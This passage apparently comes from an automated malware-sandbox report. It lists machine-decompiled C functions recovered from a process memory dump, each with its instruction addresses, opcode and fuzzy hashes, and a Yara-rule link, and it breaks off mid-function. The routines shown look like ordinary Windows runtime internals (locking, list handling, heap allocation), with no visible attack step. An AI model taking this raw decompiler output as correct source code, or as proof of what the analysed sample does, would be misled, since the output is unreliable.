							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x10d8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x10d862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x10afb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x0100dbe9
0x0100dbf2
0x0100dbf7
0x0100dbf9
0x0100dbfc
0x0100dc00
0x0100dc03
0x0100dc14
0x0100dd54
0x0100dd54
0x0100dd54
0x0100dc18
0x0100dc1d
0x0100dc1d
0x0100dc32
0x0100dc3b
0x0100dc3e
0x0100dc46
0x0100dd5b
0x0100dd62
0x0100dd64
0x0100dd67
0x0100dd69
0x0100dd6b
0x0100dd6e
0x0100dd70
0x0100dd73
0x0100dd73
0x00000000
0x0100dc4c
0x0100dc4e
0x01053ae3
0x01053ae8
0x01053aea
0x0100dce7
0x0100dce9
0x0100dcec
0x0100dcee
0x0100dcf0
0x0100dcf3
0x0100dcf5
0x01053af2
0x01053af5
0x01053af5
0x0100dd06
0x0100dd08
0x0100dd0b
0x0100dd12
0x01053b08
0x0100dd18
0x0100dd18
0x0100dd18
0x0100dd20
0x0100dd23
0x01053b16
0x01053b16
0x0100dd29
0x0100dd2d
0x0100dd36
0x0100dd40
0x0100dd51
0x0100dd51
0x0100dc54
0x0100dc59
0x0100dc59
0x0100dc5e
0x0100dc5e
0x0100dc63
0x0100dc66
0x0100dc6b
0x0100dc78
0x0100dc7b
0x0100dc81
0x0100dc81
0x0100dc83
0x0100dc89
0x00000000
0x00000000
0x0100dd7b
0x0100dd7b
0x0100dc8f
0x0100dc8f
0x0100dc92
0x0100dc99
0x0100dc9f
0x0100dca5
0x0100dcaa
0x0100dcaa
0x0100dcb3
0x0100dcb8
0x0100dcbb
0x0100dcc1
0x0100dccf
0x0100dcd2
0x0100dcd5
0x0100dcd7
0x0100dcda
0x0100dcdc
0x0100dcdc
0x0100dce2
0x0100dce4
0x00000000
0x0100dce4

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1197f10770dc1659f7b0c2fce117ecb8ab03a8985a204fe012eac07b5c8ef2d
Instruction ID: d66cbc83e01bbd13a3ea965374bf5301609076fbdbfba77775c40afbdf460354
Opcode Fuzzy Hash: c1197f10770dc1659f7b0c2fce117ecb8ab03a8985a204fe012eac07b5c8ef2d
Instruction Fuzzy Hash: 2E51C375A01606DFDB16DFE8C480B9EFBF1BF48310F24815AD995A7385DB31A944CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FFEF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00FFEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E00FE9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E00FE2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x00ffef4b
0x00ffef4d
0x00ffef57
0x00fff0bd
0x00fff0c2
0x00fff0d2
0x00fff0d2
0x00fff0c2
0x00ffef5d
0x00ffef5f
0x00ffef67
0x00ffef6a
0x00ffef6d
0x00ffef74
0x00ffef7f
0x00ffef82
0x00ffef82
0x00ffef86
0x00ffef88
0x00ffef8c
0x00ffef8f
0x00ffef8f
0x00ffef8f
0x00000000
0x00ffef91
0x00ffef93
0x00ffefc4
0x00ffefc4
0x00ffefc4
0x00ffefca
0x00ffefd0
0x00fff0a6
0x00000000
0x00000000
0x00fff0af
0x0104bb06
0x0104bb0a
0x00fff0b5
0x00fff0b5
0x00fff0b5
0x00fff0b5
0x00000000
0x00ffefd6
0x00ffefd9
0x00fff0de
0x00fff0e2
0x00ffefdf
0x00ffefdf
0x00ffefdf
0x00ffefe5
0x0104bafc
0x0104bafc
0x00ffefe5
0x00ffefeb
0x00ffefed
0x00fff00f
0x00fff011
0x00fff01a
0x00fff01d
0x00fff021
0x00fff028
0x00fff029
0x00fff029
0x00fff02c
0x00000000
0x00fff02c
0x00ffeff3
0x00ffeff9
0x00fff0ea
0x00fff0ed
0x00fff0ef
0x00000000
0x00fff0ef
0x00fff003
0x0104bb12
0x00fff045
0x00fff049
0x00fff051
0x00fff09e
0x00fff0a0
0x00fff0a0
0x00fff09e
0x00fff053
0x00fff064
0x00fff064
0x00fff06b
0x0104bb1a
0x0104bb1a
0x00fff071
0x00fff071
0x00fff07d
0x00fff082
0x00fff08f
0x00fff08f
0x00fff009
0x00fff00d
0x00000000
0x00fff00d
0x00ffefd0
0x00ffef97
0x00ffefa5
0x00ffefaa
0x00000000
0x00ffefac
0x00ffefac
0x00ffefac
0x00000000
0x00ffefb2
0x00fff036
0x00fff03a
0x00fff040
0x00fff090
0x00000000
0x00fff092
0x00fff042
0x00000000
0x00fff042
0x00ffefb7
0x00ffefb9
0x00ffefbc
0x00ffefb0
0x00ffefb0
0x00000000
0x00ffefbe
0x00ffefbe
0x00ffefc1
0x00000000
0x00ffefc1
0x00ffefbc
0x00ffefaa
0x00ffef91

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: acd7c75c5c6f4bee580a0204eb6e4f62658d239eccf29f15ad638d3c3eb39435
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 7351F331E0424D9FDB24CF68C0D07BEBBB1AF45324F2881B8D645933A2C775A989E791

Uniqueness

Uniqueness Score: -1.00%

Function 010B740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E010B740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0103D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0102F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L01004620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L01004620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0102F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L01004620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x010b740d
0x010b740d
0x010b7412
0x010b7413
0x010b7416
0x010b7418
0x010b741c
0x010b741f
0x010b7422
0x010b7422
0x010b7428
0x010b742a
0x010b742a
0x010b7451
0x010b7432
0x010b744f
0x010b744f
0x00000000
0x010b7434
0x010b7438
0x010b7443
0x010b7517
0x010b7517
0x010b751a
0x010b7535
0x010b7520
0x010b7527
0x010b752c
0x010b7531
0x010b7533
0x00000000
0x010b7533
0x00000000
0x010b7531
0x010b754b
0x010b754f
0x010b755c
0x010b755c
0x010b755f
0x010b7560
0x010b7561
0x010b7562
0x010b7563
0x010b7568
0x010b756a
0x010b756c
0x010b756d
0x010b756d
0x010b756f
0x010b7572
0x010b7574
0x010b7577
0x010b757c
0x010b757f
0x00000000
0x010b7551
0x010b7551
0x010b7551
0x010b7553
0x010b7553
0x010b7449
0x010b7449
0x010b744c
0x010b744c
0x00000000
0x010b744c
0x010b7443
0x010b750e
0x010b7514
0x010b7514
0x010b7455
0x010b7469
0x010b746d
0x00000000
0x010b7473
0x010b7473
0x010b7476
0x010b7480
0x010b7484
0x010b748e
0x010b7493
0x010b7493
0x010b7496
0x010b7499
0x010b74a1
0x010b74b1
0x010b74b5
0x00000000
0x010b74bb
0x010b74c1
0x010b74c1
0x010b74c4
0x010b74c5
0x010b74c6
0x010b74c7
0x010b74c8
0x010b74cd
0x00000000
0x010b74d3
0x010b74d3
0x010b74d6
0x010b74d8
0x010b74db
0x010b74dd
0x010b74e0
0x010b74e7
0x010b74ee
0x010b74ee
0x010b74f4
0x010b74f9
0x00000000
0x010b74fb
0x010b74fb
0x010b74fd
0x010b7500
0x010b7503
0x010b7505
0x010b7505
0x010b74f9
0x00000000
0x010b74cd
0x010b74b5
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 182c1e226bf7f8f6f8658c49a7618688e4b80085c0c3d0c9df78b54c4c627f15
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: FB51A071600646EFDB16CF18C980A96BBF5FF85304F14C0AAE948DF292E7B1E945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01012990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E01012990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x10bff00);
				E0103D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0xfc1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0102E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0xfc1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E010651BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0xfc166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E01012AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E00FF6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E01012C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E00FFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E01012AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E01012C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E01012ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0103D0D1(_t62);
				goto L28;
			}

0x01012990
0x01012992
0x01012997
0x010129a3
0x010129a6
0x010129ab
0x010129ad
0x010129b2
0x01055c80
0x010129b8
0x010129b8
0x010129bb
0x010129c0
0x010129c5
0x010129c6
0x010129c6
0x010129cb
0x00000000
0x00000000
0x010129cd
0x010129d0
0x010129d9
0x010129db
0x010129dd
0x01012a7f
0x01012a84
0x01012a87
0x01012a89
0x01055ca1
0x01055ca3
0x00000000
0x01012a8f
0x01012a8f
0x00000000
0x01012a8f
0x00000000
0x010129e3
0x010129e3
0x010129e3
0x00000000
0x010129e3
0x010129dd
0x00000000
0x010129db
0x010129e6
0x010129e9
0x010129eb
0x010129ed
0x010129f3
0x010129f5
0x010129f8
0x010129fa
0x01012a97
0x01012a9a
0x01012a9d
0x01012add
0x00000000
0x01012a9f
0x01012aa2
0x01012aa5
0x01012aa8
0x01012aab
0x01055cab
0x01055caf
0x01055cc5
0x01055cda
0x01055cdc
0x01055cdf
0x01055ce5
0x00000000
0x01055ceb
0x01055ced
0x01055cee
0x00000000
0x01055cee
0x01055cb1
0x01055cb4
0x01055cb9
0x01055cbb
0x00000000
0x01055cbd
0x01055cbd
0x00000000
0x01055cbd
0x01055cbb
0x01012ab1
0x01012ab1
0x01012ac4
0x01012ac6
0x01012ac6
0x00000000
0x01012ac6
0x01012aab
0x00000000
0x01012a00
0x01012a09
0x01012a0e
0x01012a21
0x01012a24
0x01012a35
0x01012a3a
0x01012a3d
0x01012a42
0x01012a59
0x01012a59
0x01012a5c
0x01012a5f
0x01012a5f
0x010129fa
0x010129f3
0x01012a64
0x01012a64
0x01012a6b
0x01012a6b
0x01012a6d
0x01012a72
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f584d316c7ad65b33ad8e2fba2a12075716c154d9ec49601bd0fc3bdd33b6d98
Instruction ID: 3c0a5721987e749df8702589936c313544de06ca4f7b9a91b41dbaabddd12180
Opcode Fuzzy Hash: f584d316c7ad65b33ad8e2fba2a12075716c154d9ec49601bd0fc3bdd33b6d98
Instruction Fuzzy Hash: E4517C7290020ADFDF65CF99C880ADEBBB6FF48350F258055E954AB225C3399D52DF90

Uniqueness

Uniqueness Score: -1.00%

Function 01014D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E01014D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x10dd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0102FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x10d7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0102B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L01004620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E00FECCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0102B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0102F380(_t67 + 0xc, 0xfc5138, 0x10) == 0) {
								 *0x10d60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E01014F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E01014E70(0x10d86b0, 0x1015690, 0, 0) != 0) {
					_t46 = E00FECCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x01014d3b
0x01014d4d
0x01014d53
0x01014d58
0x01014d65
0x01014d6c
0x01014d71
0x01014d77
0x01014d7f
0x01014d8c
0x01014d8e
0x01014dad
0x01014db0
0x01014db7
0x01014db8
0x01014db9
0x01014dba
0x01014dbb
0x01014dc1
0x01014dc8
0x01014dcc
0x01014dd5
0x01014dde
0x01014ddf
0x01014de0
0x01014de1
0x01014de6
0x01014de7
0x01014de9
0x01014df3
0x00000000
0x00000000
0x01056c7c
0x01056c8a
0x01056c8a
0x01056c9d
0x01056ca7
0x01056cac
0x01056cb2
0x01056cb9
0x00000000
0x01056cbf
0x01056cbf
0x00000000
0x01056cbf
0x01056cb9
0x01014dfb
0x01056ccf
0x01056cd3
0x01014e32
0x01014e39
0x01056ce0
0x01056cf2
0x01056cf2
0x01056ce0
0x01014e3f
0x01014e41
0x01014e51
0x01014e51
0x01014e03
0x01014e03
0x01014e09
0x01014e0f
0x01014e57
0x00000000
0x00000000
0x01014e1b
0x01014e30
0x01014e5b
0x01014e5b
0x00000000
0x01014e30
0x01014e11
0x01014e11
0x01014e16
0x00000000
0x01014e16
0x01014e01
0x00000000
0x01014e01
0x01014da5
0x01056c6b
0x00000000
0x01014dab
0x01014dab
0x00000000
0x01014dab

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd0fd52ddbf232c35fc19bb0fb640da21a31569ffebb47df746206402a7753ea
Instruction ID: 99c109864635bb6914f999421aeeafe04770971febbced184886736221ef8eae
Opcode Fuzzy Hash: fd0fd52ddbf232c35fc19bb0fb640da21a31569ffebb47df746206402a7753ea
Instruction Fuzzy Hash: F241D271A403189FEB72DF18CC80FAABBE9EB45710F0440A9E985DB295D779DD40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01014BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E01014BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x10dd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E00FECC50(_t86);
					L11:
					return E0102B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x10d8504
				E01002280(_t9, _t9);
				_t87 = 0x78;
